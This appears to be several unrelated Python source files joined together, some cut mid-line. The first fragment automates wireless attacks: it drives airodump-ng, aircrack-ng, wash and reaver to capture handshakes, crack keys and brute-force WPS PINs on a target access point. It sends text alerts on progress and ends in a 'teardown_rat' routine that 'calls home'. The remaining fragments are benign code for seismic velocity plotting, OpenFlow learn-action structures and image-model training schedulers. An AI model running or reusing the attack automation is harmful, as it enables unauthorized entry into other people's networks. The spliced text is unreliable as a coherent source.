print parameterList
process = subprocess.Popen(parameterList,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
universal_newlines=True)
time.sleep(timeout)
os.system('sudo killall airodump-ng')
return -1
def aircrack_ng(bssid='', output_file='', source_file='', timeout=30):
parameterList = ['sudo', 'aircrack-ng']
if bssid != '':
parameterList.append('-b')
parameterList.append(bssid)
if output_file != '':
parameterList.append('-l')
parameterList.append(output_file)
if source_file != '':
parameterList.append(source_file)
else:
return False
print 'aircrack started'
print parameterList
process = subprocess.Popen(parameterList,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
universal_newlines=True)
process.wait()
return True
def wash(interface='wlan1mon', timeout=30):
if interface == '':
return False
print 'wash started'
output_file = 'AUTOwalker_wash'
process = subprocess.Popen(['sudo',
'wash',
'-i', interface,
'-o', output_file,
'-C'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
universal_newlines=True)
time.sleep(int(timeout))
os.system('sudo killall wash')
return True
def reaver(interface='wlan1mon', bssid='', timeout=30, continue_crack=False):
if bssid == '':
return False
if interface == '':
return False
print 'reaver started'
sessionFileName = '/usr/local/etc/reaver/' + bssid.replace(':','') + '.wpc'
os.system('rm AUTOwalker_reaver')
if continue_crack == True:
process = subprocess.Popen(['sudo',
'reaver',
'-i', interface,
'-b', bssid,
'-s', sessionFileName,
'-o', 'AUTOwalker_reaver'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
universal_newlines=True)
elif continue_crack == False:
os.system('rm '+sessionFileName)
process = subprocess.Popen(['sudo',
'reaver',
'-i', interface,
'-b', bssid,
'-vv',
'-o', 'AUTOwalker_reaver'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
universal_newlines=True)
time.sleep(timeout/2)
process_reaver() #optimize this, pass the file handler along, to only read where you left off.
time.sleep(timeout/2)
returnCode = process_reaver()
if returnCode == -1:
process.send_signal(signal.SIGINT)
print('limited')
send_text('ABORTED: Rate Limited for '+bssid)
#return -1
#Send a text message that the AP is limited, crack is not viable
elif returnCode >= 10:
process.send_signal(signal.SIGINT)
print('takestoolong')
send_text('ABORTED: Takes too long on '+bssid)
#return -11
#Send a text message that the pins take a long time. Continuation of crack is possible.
elif returnCode == -2:
process.send_signal(signal.SIGINT)
print('itworks')
return True
def teardown_rat():
print 'Calling home and tearing down!'
wvdialConfig = 'call_home'
wvdialNetworkConfig = 'network'
callHome = ['sudo', 'screen', '-d', | |
<filename>pycvm/horizontal_slice.py
##
# @file horizontal_slice.py
# @brief Plots a horizontal slice either for display or saving to a file.
# @author <NAME> - SCEC <<EMAIL>>
# @version 14.7.0
#
# Allows for generation of a horizontal slice, either interactively, via
# arguments, or through Python code in the class HorizontalSlice.
# Imports
from mpl_toolkits import basemap
from mpl_toolkits.basemap import cm
from common import Plot, Point, MaterialProperties, UCVM, UCVM_CVMS, \
math, pycvm_cmapDiscretize, cm, mcolors, basemap, np, plt
##
# @class HorizontalSlice
# @brief Plots a horizontal slice starting at a given @link common.Point Point @endlink
# to another @link common.Point Point @endlink.
#
# Generates a horizontal slice that can either be displayed to the user, saved to a file
# or differenced with another plot.
class HorizontalSlice:
##
# Initializes the horizontal slice. The slice will go from the upper-left
# @link common.Point Point @endlink parameter to the bottom-right
# @link common.Point Point @endlink parameter, at the depth specified in the
# upper-left point.
#
# @param upperleftpoint The @link common.Point starting point @endlink from which this plot should start.
# @param bottomrightpoint The @link common.Point ending point @endlink at which this plot should end.
# @param meta The metadata to hold configuration values
#
def __init__(self, upperleftpoint, bottomrightpoint, meta={}) :
self.meta = meta
if 'nx' in self.meta :
self.xsteps = self.meta['nx']
else:
self.xsteps = None
if 'ny' in self.meta :
self.ysteps = self.meta['ny']
else:
self.ysteps = None
if 'datafile' in self.meta :
self.datafile = self.meta['datafile']
else:
self.datafile = None
if 'outfile' in self.meta:
self.filename = self.meta['outfile']
else:
self.filename = None
if not isinstance(upperleftpoint, Point):
raise TypeError("Parameter upperleftpoint must be of type Point.")
else:
## The upper-left point from which this plot should originate.
self.upperleftpoint = upperleftpoint
if not isinstance(bottomrightpoint, Point):
raise TypeError("Parameter bottomrightpoint must be of type Point.")
else:
## The bottom-right corner at which this plot should end.
self.bottomrightpoint = bottomrightpoint
# Check that the bottom-right point is below and right of the upper-left point.
if (self.upperleftpoint.longitude > self.bottomrightpoint.longitude) or \
(self.upperleftpoint.latitude < self.bottomrightpoint.latitude):
raise ValueError("The upper-left point must be higher than, and to the " + \
"left of, the bottom-right point.")
if 'spacing' in self.meta:
self.spacing = self.meta['spacing']
# Check the spacing. If it's specified in meters, convert to degrees.
try:
## The spacing for the plot, defined in degrees. If meters specified, it's converted to degrees.
self.spacing = float(self.spacing)
except Exception:
print("TODO")
## The community velocity model from which the data should be retrieved.
if 'cvm' in self.meta:
self.cvm = self.meta['cvm']
else:
self.cvm = None
if 'installdir' in self.meta:
self.installdir = self.meta['installdir']
else:
self.installdir = None
if 'configfile' in self.meta:
self.configfile = self.meta['configfile']
else:
self.configfile = None
if 'title' in self.meta :
self.title = self.meta['title']
else:
self.title = None;
##
# Retrieves the values for this horizontal slice and stores them in the class.
def getplotvals(self, mproperty="vs"):
# How many y and x values will we need?
## The plot width - needs to be stored as property for the plot function to work.
self.plot_width = self.bottomrightpoint.longitude - self.upperleftpoint.longitude
## The plot height - needs to be stored as a property for the plot function to work.
self.plot_height = self.upperleftpoint.latitude - self.bottomrightpoint.latitude
## The number of x points we retrieved. Stored as a property for the plot function to work.
if ( self.xsteps ) :
self.num_x = int(self.xsteps)
else :
self.num_x = int(math.ceil(self.plot_width / self.spacing)) + 1
## The number of y points we retrieved. Stored as a property for the plot function to work.
if ( self.ysteps ) :
self.num_y = int(self.ysteps)
else :
self.num_y = int(math.ceil(self.plot_height / self.spacing)) + 1
## The 2D array of retrieved material properties.
self.materialproperties = [[MaterialProperties(-1, -1, -1) for x in range(self.num_x)] for x in range(self.num_y)]
u = UCVM(install_dir=self.installdir, config_file=self.configfile)
### MEI
if (self.datafile != None) :
data=[]
if self.datafile.rfind(".raw") != -1 :
data = u.import_raw_data(self.datafile, self.num_x, self.num_y)
else: ## with .bin file
data2d = u.import_np_float_array(self.datafile, self.num_x, self.num_y)
## flatten them
data1d = data2d.reshape([1, self.num_x * self.num_y])
## turn first one into a list
data=data1d[0].tolist()
print("\nUsing --> "+self.datafile)
else:
# Generate a list of points to pass to UCVM.
ucvmpoints = []
for y in range(0, self.num_y):
for x in range(0, self.num_x):
ucvmpoints.append(Point(self.upperleftpoint.longitude + x * self.spacing, \
self.bottomrightpoint.latitude + y * self.spacing, \
self.upperleftpoint.depth))
data = u.query(ucvmpoints, self.cvm)
i = 0
j = 0
isfloat = 0
# fp=open("raw_data","w")
if (self.datafile != None) :
isfloat = 1
for matprop in data:
if isfloat:
self.materialproperties[i][j].setProperty(mproperty,matprop)
# float_string = "%.5f\n" % matprop
# fp.write(float_string)
else:
self.materialproperties[i][j]=matprop
j = j + 1
if j >= self.num_x:
j = 0
i = i + 1
# fp.close()
##
# Plots the horizontal slice either to an image or a file name.
#
def plot(self, horizontal_label = None):
if self.upperleftpoint.description == None:
location_text = ""
else:
location_text = self.upperleftpoint.description + " "
if 'data_type' in self.meta :
mproperty = self.meta['data_type']
else:
mproperty = "vs"
scale_gate = None
if 'color' in self.meta :
color_scale = self.meta['color']
if 'gate' in self.meta :
scale_gate = float(self.meta['gate'])
if color_scale == "b" and scale_gate is None:
scale_gate=2.5
# Gets the better CVM description if it exists.
try:
cvmdesc = UCVM_CVMS[self.cvm]
except:
cvmdesc = self.cvm
if 'title' in self.meta :
title = self.meta['title']
else:
title = "%s%s Horizontal Slice at %.0fm" % (location_text, cvmdesc, self.upperleftpoint.depth)
self.meta['title'] = title
self.getplotvals(mproperty)
# Call the plot object.
p = Plot(title, "", "", None, 10, 10)
u = UCVM(install_dir=self.installdir, config_file=self.configfile)
BOUNDS = u.makebounds()
TICKS = u.maketicks()
m = basemap.Basemap(projection='cyl', llcrnrlat=self.bottomrightpoint.latitude, \
urcrnrlat=self.upperleftpoint.latitude, \
llcrnrlon=self.upperleftpoint.longitude, \
urcrnrlon=self.bottomrightpoint.longitude, \
resolution='f', anchor='C')
lat_ticks = np.arange(self.bottomrightpoint.latitude, self.upperleftpoint.latitude + 0.1, self.plot_height / 2)
lon_ticks = np.arange(self.upperleftpoint.longitude, self.bottomrightpoint.longitude + 0.1, self.plot_width / 2)
m.drawparallels(lat_ticks, linewidth=1.0, labels=[1,0,0,0])
m.drawmeridians(lon_ticks, linewidth=1.0, labels=[0,0,0,1])
m.drawstates()
m.drawcountries()
alons = np.arange(self.upperleftpoint.longitude, self.bottomrightpoint.longitude, self.spacing)
alats = np.arange(self.bottomrightpoint.latitude, self.upperleftpoint.latitude, self.spacing)
lons = np.linspace(self.upperleftpoint.longitude, self.bottomrightpoint.longitude - self.spacing, self.num_x-1)
lats = np.linspace(self.bottomrightpoint.latitude, self.upperleftpoint.latitude - self.spacing, self.num_y-1)
# Get the properties.
datapoints = np.arange(self.num_x * self.num_y,dtype=np.float32).reshape(self.num_y, self.num_x)
nancnt=0
zerocnt=0
negcnt=0
## print("total cnt is %d"%(self.num_x * self.num_y))
for i in range(0, self.num_y):
for j in range(0, self.num_x):
if (self.datafile != None) :
datapoints[i][j] = self.materialproperties[i][j].getProperty(mproperty)
elif mproperty != "poisson":
if color_scale == "sd" or color_scale == "sd_r":
datapoints[i][j] = self.materialproperties[i][j].getProperty(mproperty)
if(datapoints[i][j] == -1 ) :
datapoints[i][j]=np.nan
nancnt=nancnt+1
##to have blank background
## if (datapoints[i][j] == 0) :
## datapoints[i][j]=np.nan
## zerocnt=zerocnt+1
##
else:
datapoints[i][j] = self.materialproperties[i][j].getProperty(mproperty)
if (datapoints[i][j] == 0) :
# KEEP 0 as 0 datapoints[i][j]=np.nan
zerocnt=zerocnt+1
if (datapoints[i][j] < 0) :
negcnt=negcnt+1
if(datapoints[i][j] == -1 ) :
datapoints[i][j]=np.nan
nancnt=nancnt+1
else :
datapoints[i][j] = u.poisson(self.materialproperties[i][j].vs, self.materialproperties[i][j].vp)
# print(" total number of nancnt is "+str(nancnt))
# print(" total number of zerocnt is "+str(zerocnt))
# print(" total number of negcnt is "+str(negcnt))
myInt=1000
if mproperty == "poisson": ## no need to reduce.. should also be using sd or dd
myInt=1
if color_scale == "s" :
color_scale = "sd"
elif color_scale == "d" :
color_scale = "dd"
newdatapoints=datapoints/myInt
newmax_val=np.nanmax(newdatapoints)
newmin_val=np.nanmin(newdatapoints)
newmean_val=np.mean(newdatapoints)
self.max_val=np.nanmax(datapoints)
self.min_val=np.nanmin(datapoints)
self.mean_val=np.mean(datapoints)
if color_scale == "s":
colormap = basemap.cm.GMT_seis
norm = mcolors.Normalize(vmin=BOUNDS[0],vmax=BOUNDS[len(BOUNDS) - 1])
elif color_scale == "s_r":
colormap = basemap.cm.GMT_seis_r
norm = mcolors.Normalize(vmin=BOUNDS[0],vmax=BOUNDS[len(BOUNDS) - 1])
elif color_scale == "sd":
BOUNDS= u.makebounds(newmin_val, newmax_val, 5, newmean_val, substep=5)
# colormap = basemap.cm.GMT_globe
colormap = basemap.cm.GMT_seis
TICKS = u.maketicks(newmin_val, newmax_val, 5)
norm = mcolors.Normalize(vmin=BOUNDS[0],vmax=BOUNDS[len(BOUNDS) - 1])
elif color_scale == "b":
C = []
for bound in BOUNDS :
if bound < scale_gate :
C.append("grey")
else:
C.append("red")
colormap = mcolors.ListedColormap(C)
norm = mcolors.BoundaryNorm(BOUNDS, colormap.N)
elif color_scale == "d":
colormap = pycvm_cmapDiscretize(basemap.cm.GMT_seis, len(BOUNDS) - 1)
norm = mcolors.BoundaryNorm(BOUNDS, colormap.N)
elif color_scale == "d_r":
colormap = pycvm_cmapDiscretize(basemap.cm.GMT_seis_r, len(BOUNDS) - 1)
norm = mcolors.BoundaryNorm(BOUNDS, colormap.N)
elif color_scale == 'dd':
BOUNDS= u.makebounds(newmin_val, newmax_val, 5, newmean_val, substep=5,all=True)
TICKS = u.maketicks(newmin_val, newmax_val, 5)
colormap = pycvm_cmapDiscretize(basemap.cm.GMT_seis, len(BOUNDS) - 1)
# colormap = pycvm_cmapDiscretize(basemap.cm.GMT_globe, len(BOUNDS) - 1)
norm = mcolors.BoundaryNorm(BOUNDS, colormap.N)
else:
print("ERROR: unknown option | |
source address B in
* VLAN C, this would set up the flow "dl_dst=B, vlan_vid=C,
* actions=output:A".
*
* In syntax accepted by ovs-ofctl, this action is:
* learn(NXM_OF_VLAN_TCI[0..11], NXM_OF_ETH_DST[]=NXM_OF_ETH_SRC[],
* output:NXM_OF_IN_PORT[])
*
* 3. Here's a recipe for a very simple-minded MAC learning switch. It uses a
* 10-second MAC expiration time to make it easier to see what's going on
*
* ovs-vsctl del-controller br0
* ovs-ofctl del-flows br0
* ovs-ofctl add-flow br0 "table=0 actions=learn(table=1, \
hard_timeout=10, NXM_OF_VLAN_TCI[0..11], \
NXM_OF_ETH_DST[]=NXM_OF_ETH_SRC[], \
output:NXM_OF_IN_PORT[]), resubmit(,1)"
* ovs-ofctl add-flow br0 "table=1 priority=0 actions=flood"
*
* You can then dump the MAC learning table with:
*
* ovs-ofctl dump-flows br0 table=1
*
* Usage Advice
* ------------
*
* For best performance, segregate learned flows into a table that is not used
* for any other flows except possibly for a lowest-priority "catch-all" flow
* (a flow with no match criteria). If different learning actions specify
* different match criteria, use different tables for the learned flows.
*
* The meaning of 'hard_timeout' and 'idle_timeout' can be counterintuitive.
* These timeouts apply to the flow that is added, which means that a flow with
* an idle timeout will expire when no traffic has been sent *to* the learned
* address. This is not usually the intent in MAC learning; instead, we want
* the MAC learn entry to expire when no traffic has been sent *from* the
* learned address. Use a hard timeout for that.
*/
'''
def _nx_flow_mod_spec_formatter(x):
if NX_FLOWMODSPEC_SRC(x['header']):
srcdesc = '0x' + ''.join('%02x' % (c,) for c in bytearray(x['value']))
else:
srcdesc = '%s[%d..%d]' % (x['src'], x['src_ofs'], x['src_ofs'] + NX_FLOWMODSPEC_NBITS(x['header']) - 1)
dstv = NX_FLOWMODSPEC_DST(x['header'])
if dstv != NX_LEARN_DST_OUTPUT:
dstdesc = '%s[%d..%d]' % (x['dst'], x['dst_ofs'], x['dst_ofs'] + NX_FLOWMODSPEC_NBITS(x['header']) - 1)
if dstv == NX_LEARN_DST_MATCH:
x['_desc'] = '%s=%s' % (dstdesc, srcdesc)
elif dstv == NX_LEARN_DST_LOAD:
x['_desc'] = 'load:%s->%s' % (srcdesc, dstdesc)
elif NX_FLOWMODSPEC_SRC(x['header']):
x['_desc'] = 'output:%s' % nxm_port_no_raw.formatter(common.create_binary(x['value'], 2))
else:
x['_desc'] = 'output:%s' % (srcdesc,)
x['header'] = nx_flow_mod_spec_header.formatter(x['header'])
return x
nx_flow_mod_spec = nstruct(
(uint16, 'header'),
(_nx_flow_mod_spec_src,),
(_nx_flow_mod_spec_dst,),
name = 'nx_flow_mod_spec',
padding = 1,
formatter = _nx_flow_mod_spec_formatter,
lastextra = False
# if x.header == 0, size is 14, the padding should not be so large so it will not be successfully parsed
)
namespace['nx_flow_mod_spec'] = nx_flow_mod_spec
def create_nxfms_matchfield(src, dst, src_ofs = 0, dst_ofs = 0, n_bits = None):
if n_bits is None:
n_bits = min(NXM_LENGTH(dst) * 8 - dst_ofs, NXM_LENGTH(src) * 8 - src_ofs)
if n_bits <= 0:
raise ValueError('Cannot create flow mod spec with 0 bits')
return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_FIELD, NX_LEARN_DST_MATCH, n_bits) + _create_field(src, src_ofs) + _create_field(dst, dst_ofs))[0]
namespace['create_nxfms_matchfield'] = create_nxfms_matchfield
def create_nxfms_matchvalue(dst, value, dst_ofs, n_bits = None):
if n_bits is None:
n_bits = NXM_LENGTH(dst) * 8 - dst_ofs
if n_bits <= 0:
raise ValueError('Cannot create flow mod spec with 0 bits')
return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_IMMEDIATE, NX_LEARN_DST_MATCH, n_bits) + common.create_binary(value, (n_bits + 15) // 16 * 2) + _create_field(dst, dst_ofs))[0]
namespace['create_nxfms_matchvalue'] = create_nxfms_matchvalue
def create_nxfms_loadfield(src, dst, src_ofs = 0, dst_ofs = 0, n_bits = None):
if n_bits is None:
n_bits = min(NXM_LENGTH(dst) * 8 - dst_ofs, NXM_LENGTH(src) * 8 - src_ofs)
if n_bits <= 0:
raise ValueError('Cannot create flow mod spec with 0 bits')
return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_FIELD, NX_LEARN_DST_LOAD, n_bits) + _create_field(src, src_ofs) + _create_field(dst, dst_ofs))[0]
namespace['create_nxfms_loadfield'] = create_nxfms_loadfield
def create_nxfms_loadvalue(dst, value, dst_ofs, n_bits = None):
if n_bits is None:
n_bits = NXM_LENGTH(dst) * 8 - dst_ofs
if n_bits <= 0:
raise ValueError('Cannot create flow mod spec with 0 bits')
return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_IMMEDIATE, NX_LEARN_DST_LOAD, n_bits) + common.create_binary(value, (n_bits + 15) // 16 * 2) + _create_field(dst, dst_ofs))[0]
namespace['create_nxfms_loadvalue'] = create_nxfms_loadvalue
def create_nxfms_outputfield(src, src_ofs = 0, n_bits = None):
if n_bits is None:
n_bits = NXM_LENGTH(src) * 8 - src_ofs
if n_bits <= 0:
raise ValueError('Cannot create flow mod spec with 0 bits')
return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_FIELD, NX_LEARN_DST_OUTPUT, n_bits) + _create_field(src, src_ofs))[0]
namespace['create_nxfms_outputfield'] = create_nxfms_outputfield
def create_nxfms_outputvalue(dst, value):
return nx_flow_mod_spec.parse(_create_header(NX_LEARN_SRC_IMMEDIATE, NX_LEARN_DST_OUTPUT, 16) + common.create_binary(value, 2))[0]
namespace['create_nxfms_outputvalue'] = create_nxfms_outputvalue
ofp_flow_mod_flags = namespace['ofp_flow_mod_flags']
nx_action_learn = nstruct(
(uint16, 'idle_timeout'), # /* Idle time before discarding (seconds). */
(uint16, 'hard_timeout'), # /* Max time before discarding (seconds). */
(uint16, 'priority'), # /* Priority level of flow entry. */
(uint64, 'cookie'), # /* Cookie for new flow. */
(ofp_flow_mod_flags, 'flags'), # /* Either 0 or OFPFF_SEND_FLOW_REM. */
(uint8, 'table_id'), # /* Table to insert flow entry. */
(uint8,), # /* Must be zero. */
(uint16, 'fin_idle_timeout'),# /* Idle timeout after FIN, if nonzero. */
(uint16, 'fin_hard_timeout'),# /* Hard timeout after FIN, if nonzero. */
(nx_flow_mod_spec[0], 'specs'),
base = nx_action,
name = 'nx_action_learn',
classifyby = (NXAST_LEARN,),
criteria = lambda x: getattr(x, action_subtype) == NXAST_LEARN,
init = packvalue(NXAST_LEARN, action_subtype),
)
namespace['nx_action_learn'] = nx_action_learn
'''
/* Action structure for NXAST_FIN_TIMEOUT.
*
* This action changes the idle timeout or hard timeout, or both, of this
* OpenFlow rule when the rule matches a TCP packet with the FIN or RST flag.
* When such a packet is observed, the action reduces the rule's idle timeout
* to 'fin_idle_timeout' and its hard timeout to 'fin_hard_timeout'. This
* action has no effect on an existing timeout that is already shorter than the
* one that the action specifies. A 'fin_idle_timeout' or 'fin_hard_timeout'
* of zero has no effect on the respective timeout.
*
* 'fin_idle_timeout' and 'fin_hard_timeout' are measured in seconds.
* 'fin_hard_timeout' specifies time since the flow's creation, not since the
* receipt of the FIN or RST.
*
* This is useful for quickly discarding learned TCP flows that otherwise will
* take a long time to expire.
*
* This action is intended for use with an OpenFlow rule that matches only a
* single TCP flow. If the rule matches multiple TCP flows (e.g. it wildcards
* all TCP traffic, or all TCP traffic to a particular port), then any FIN or
* RST in any of those flows will cause the entire OpenFlow rule to expire
* early, which is not normally desirable.
*/
'''
nx_action_fin_timeout = nstruct(
(uint16, 'fin_idle_timeout'), # /* New idle timeout, if nonzero. */
(uint16, 'fin_hard_timeout'), # /* New hard timeout, if nonzero. */
(uint16,),
base = nx_action,
name = 'nx_action_fin_timeout',
criteria = lambda x: getattr(x, action_subtype) == NXAST_FIN_TIMEOUT,
classifyby = (NXAST_FIN_TIMEOUT,),
init = packvalue(NXAST_FIN_TIMEOUT, action_subtype)
)
namespace['nx_action_fin_timeout'] = nx_action_fin_timeout
'''
/* Action structure for NXAST_BUNDLE and NXAST_BUNDLE_LOAD.
*
* The bundle actions choose a slave from a supplied list of options.
* NXAST_BUNDLE outputs to its selection. NXAST_BUNDLE_LOAD writes its
* selection to a register.
*
* The list of possible slaves follows the nx_action_bundle structure. The size
* of each slave is governed by its type as indicated by the 'slave_type'
* parameter. The list of slaves should be padded at its end with zeros to make
* the total length of the action a multiple of 8.
*
* Switches infer from the 'slave_type' parameter the size of each slave. All
* implementations must support the NXM_OF_IN_PORT 'slave_type' which indicates
* that the slaves are OpenFlow port numbers with NXM_LENGTH(NXM_OF_IN_PORT) ==
* 2 byte width. Switches should reject actions which indicate unknown or
* unsupported slave types.
*
* Switches use a strategy dictated by the 'algorithm' parameter to choose a
* slave. If the switch does not support the specified 'algorithm' parameter,
* it should reject the action.
*
* Several algorithms take into account liveness when selecting slaves. The
* liveness of a slave is implementation defined (with one exception), but will
* generally take into account things like its carrier status and the results
* of any link monitoring protocols which happen to be running on it. In order
* to give controllers a place-holder value, the OFPP_NONE port is always
* considered live.
*
* Some slave selection strategies require the use of a hash function, in which
| |
<reponame>Hidberg/Landmark2019-1st-and-3rd-Place-Solution
import itertools
import random
import math
import albumentations.augmentations.functional as F
import cv2
from PIL import Image
import numpy as np
import torch
from albumentations import ImageOnlyTransform
from torch.optim.lr_scheduler import _LRScheduler
from torch.utils.data.sampler import BatchSampler
from torch.utils.data.sampler import Sampler
from torch._six import int_classes as _int_classes
from src.autoaugment import ImageNetPolicy
class PiecewiseCyclicalLinearLR(_LRScheduler):
r"""Set the learning rate of each parameter group using a piecewise
cyclical linear schedule.
When last_epoch=-1, sets initial lr as lr.
_Loss Surfaces, Mode Connectivity, and Fast Ensembling of DNNs
https://arxiv.org/pdf/1802.10026
Exploring loss function topology with cyclical learning rates
https://arxiv.org/abs/1702.04283
"""
def __init__(self, optimizer, c, alpha1=1e-2, alpha2=5e-4, last_epoch=-1):
"""
:param c: cycle length
:param alpha1: lr upper bound of cycle
:param alpha2: lr lower bounf of cycle
"""
self.c = c
self.alpha1 = alpha1
self.alpha2 = alpha2
super(PiecewiseCyclicalLinearLR, self).__init__(optimizer, last_epoch)
def get_lr(self):
lrs = []
for _ in range(len(self.base_lrs)):
ti = ((self.last_epoch - 1) % self.c + 1) / self.c
if 0 <= ti <= 0.5:
lr = (1 - 2 * ti) * self.alpha1 + 2 * ti * self.alpha2
elif 0.5 < ti <= 1.0:
lr = (2 - 2 * ti) * self.alpha2 + (2 * ti - 1) * self.alpha1
else:
raise ValueError('t(i) is out of range [0,1].')
lrs.append(lr)
return lrs
class PolyLR(_LRScheduler):
def __init__(self, optimizer, power=0.9, max_epoch=4e4, last_epoch=-1):
"""The argument name "epoch" also can be thought as "iter"."""
self.power = power
self.max_epoch = max_epoch
self.last_epoch = last_epoch
super(PolyLR, self).__init__(optimizer, last_epoch)
def get_lr(self):
lrs = []
for base_lr in self.base_lrs:
lr = base_lr * (1.0 - (self.last_epoch / self.max_epoch)) ** self.power
lrs.append(lr)
return lrs
class WarmupCosineAnnealingLR(torch.optim.lr_scheduler._LRScheduler):
"""cosine annealing scheduler with warmup.
Args:
optimizer (Optimizer): Wrapped optimizer.
T_max (int): Maximum number of iterations.
eta_min (float): Minimum learning rate. Default: 0.
last_epoch (int): The index of last epoch. Default: -1.
.. _SGDR\: Stochastic Gradient Descent with Warm Restarts:
https://arxiv.org/abs/1608.03983
"""
def __init__(
self,
optimizer,
T_max,
eta_min,
warmup_factor=1.0 / 3,
warmup_iters=500,
warmup_method="linear",
last_epoch=-1,
):
if warmup_method not in ("constant", "linear"):
raise ValueError(
"Only 'constant' or 'linear' warmup_method accepted"
"got {}".format(warmup_method)
)
self.T_max = T_max
self.eta_min = eta_min
self.warmup_factor = warmup_factor
self.warmup_iters = warmup_iters
self.warmup_method = warmup_method
super(WarmupCosineAnnealingLR, self).__init__(optimizer, last_epoch)
def get_lr(self):
if self.last_epoch < self.warmup_iters:
return self.get_lr_warmup()
else:
return self.get_lr_cos_annealing()
def get_lr_warmup(self):
if self.warmup_method == "constant":
warmup_factor = self.warmup_factor
elif self.warmup_method == "linear":
alpha = self.last_epoch / self.warmup_iters
warmup_factor = self.warmup_factor * (1 - alpha) + alpha
return [
base_lr * warmup_factor
for base_lr in self.base_lrs
]
def get_lr_cos_annealing(self):
last_epoch = self.last_epoch - self.warmup_iters
T_max = self.T_max - self.warmup_iters
return [self.eta_min + (base_lr - self.eta_min) *
(1 + math.cos(math.pi * last_epoch / T_max)) / 2
for base_lr in self.base_lrs]
def _pad_const(x, target_height, target_width, value=255, center=True, pad_loc_seed=None):
random.seed(pad_loc_seed)
height, width = x.shape[:2]
if height < target_height:
if center:
h_pad_top = int((target_height - height) / 2.0)
else:
h_pad_top = random.randint(a=0, b=target_height - height)
h_pad_bottom = target_height - height - h_pad_top
else:
h_pad_top = 0
h_pad_bottom = 0
if width < target_width:
if center:
w_pad_left = int((target_width - width) / 2.0)
else:
w_pad_left = random.randint(a=0, b=target_width - width)
w_pad_right = target_width - width - w_pad_left
else:
w_pad_left = 0
w_pad_right = 0
x = cv2.copyMakeBorder(x, h_pad_top, h_pad_bottom, w_pad_left, w_pad_right,
cv2.BORDER_CONSTANT, value=value)
return x
class RandomCropThenScaleToOriginalSize(ImageOnlyTransform):
"""Crop a random part of the input and rescale it to some size.
Args:
limit (float): maximum factor range for cropping region size.
interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:
cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.
Default: cv2.INTER_LINEAR.
pad_value (int): pixel value for padding.
p (float): probability of applying the transform. Default: 1.
"""
def __init__(self, limit=0.1, interpolation=cv2.INTER_LINEAR, pad_value=0, p=1.0):
super(RandomCropThenScaleToOriginalSize, self).__init__(p)
self.limit = limit
self.interpolation = interpolation
self.pad_value = pad_value
def apply(self, img, height_scale=1.0, width_scale=1.0, h_start=0, w_start=0, interpolation=cv2.INTER_LINEAR,
pad_value=0, pad_loc_seed=None, **params):
img_height, img_width = img.shape[:2]
crop_height, crop_width = int(img_height * height_scale), int(img_width * width_scale)
crop = self.random_crop(img, crop_height, crop_width, h_start, w_start, pad_value, pad_loc_seed)
return F.resize(crop, img_height, img_width, interpolation)
def get_params(self):
height_scale = 1.0 + random.uniform(-self.limit, self.limit)
width_scale = 1.0 + random.uniform(-self.limit, self.limit)
return {'h_start': random.random(),
'w_start': random.random(),
'height_scale': height_scale,
'width_scale': width_scale,
'pad_loc_seed': random.random()}
def update_params(self, params, **kwargs):
if hasattr(self, 'interpolation'):
params['interpolation'] = self.interpolation
if hasattr(self, 'pad_value'):
params['pad_value'] = self.pad_value
params.update({'cols': kwargs['image'].shape[1], 'rows': kwargs['image'].shape[0]})
return params
@staticmethod
def random_crop(img, crop_height, crop_width, h_start, w_start, pad_value=0, pad_loc_seed=None):
height, width = img.shape[:2]
if height < crop_height or width < crop_width:
img = _pad_const(img, crop_height, crop_width, value=pad_value, center=False, pad_loc_seed=pad_loc_seed)
y1 = max(int((height - crop_height) * h_start), 0)
y2 = y1 + crop_height
x1 = max(int((width - crop_width) * w_start), 0)
x2 = x1 + crop_width
img = img[y1:y2, x1:x2]
return img
class AutoAugmentWrapper(ImageOnlyTransform):
def __init__(self, p=1.0):
super(AutoAugmentWrapper, self).__init__(p)
self.autoaugment = ImageNetPolicy()
def apply(self, img, **params):
img = Image.fromarray(img)
img = self.autoaugment(img)
img = np.asarray(img)
return img
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
class GroupedBatchSampler(BatchSampler):
"""
Wraps another sampler to yield a mini-batch of indices.
It enforces that elements from the same group should appear in groups of batch_size.
It also tries to provide mini-batches which follows an ordering which is
as close as possible to the ordering from the original sampler.
Arguments:
sampler (Sampler): Base sampler.
batch_size (int): Size of mini-batch.
drop_uneven (bool): If ``True``, the sampler will drop the batches whose
size is less than ``batch_size``
"""
def __init__(self, sampler, group_ids, batch_size, drop_uneven=False):
if not isinstance(sampler, Sampler):
raise ValueError(
"sampler should be an instance of "
"torch.utils.data.Sampler, but got sampler={}".format(sampler)
)
self.sampler = sampler
self.group_ids = torch.as_tensor(group_ids)
assert self.group_ids.dim() == 1
self.batch_size = batch_size
self.drop_uneven = drop_uneven
self.groups = torch.unique(self.group_ids).sort(0)[0]
self._can_reuse_batches = False
def _prepare_batches(self):
dataset_size = len(self.group_ids)
# get the sampled indices from the sampler
sampled_ids = torch.as_tensor(list(self.sampler))
# potentially not all elements of the dataset were sampled
# by the sampler (e.g., DistributedSampler).
# construct a tensor which contains -1 if the element was
# not sampled, and a non-negative number indicating the
# order where the element was sampled.
# for example. if sampled_ids = [3, 1] and dataset_size = 5,
# the order is [-1, 1, -1, 0, -1]
order = torch.full((dataset_size,), -1, dtype=torch.int64)
order[sampled_ids] = torch.arange(len(sampled_ids))
# get a mask with the elements that were sampled
mask = order >= 0
# find the elements that belong to each individual cluster
clusters = [(self.group_ids == i) & mask for i in self.groups]
# get relative order of the elements inside each cluster
# that follows the order from the sampler
relative_order = [order[cluster] for cluster in clusters]
# with the relative order, find the absolute order in the
# sampled space
permutation_ids = [s[s.sort()[1]] for s in relative_order]
# permute each cluster so that they follow the order from
# the sampler
permuted_clusters = [sampled_ids[idx] for idx in permutation_ids]
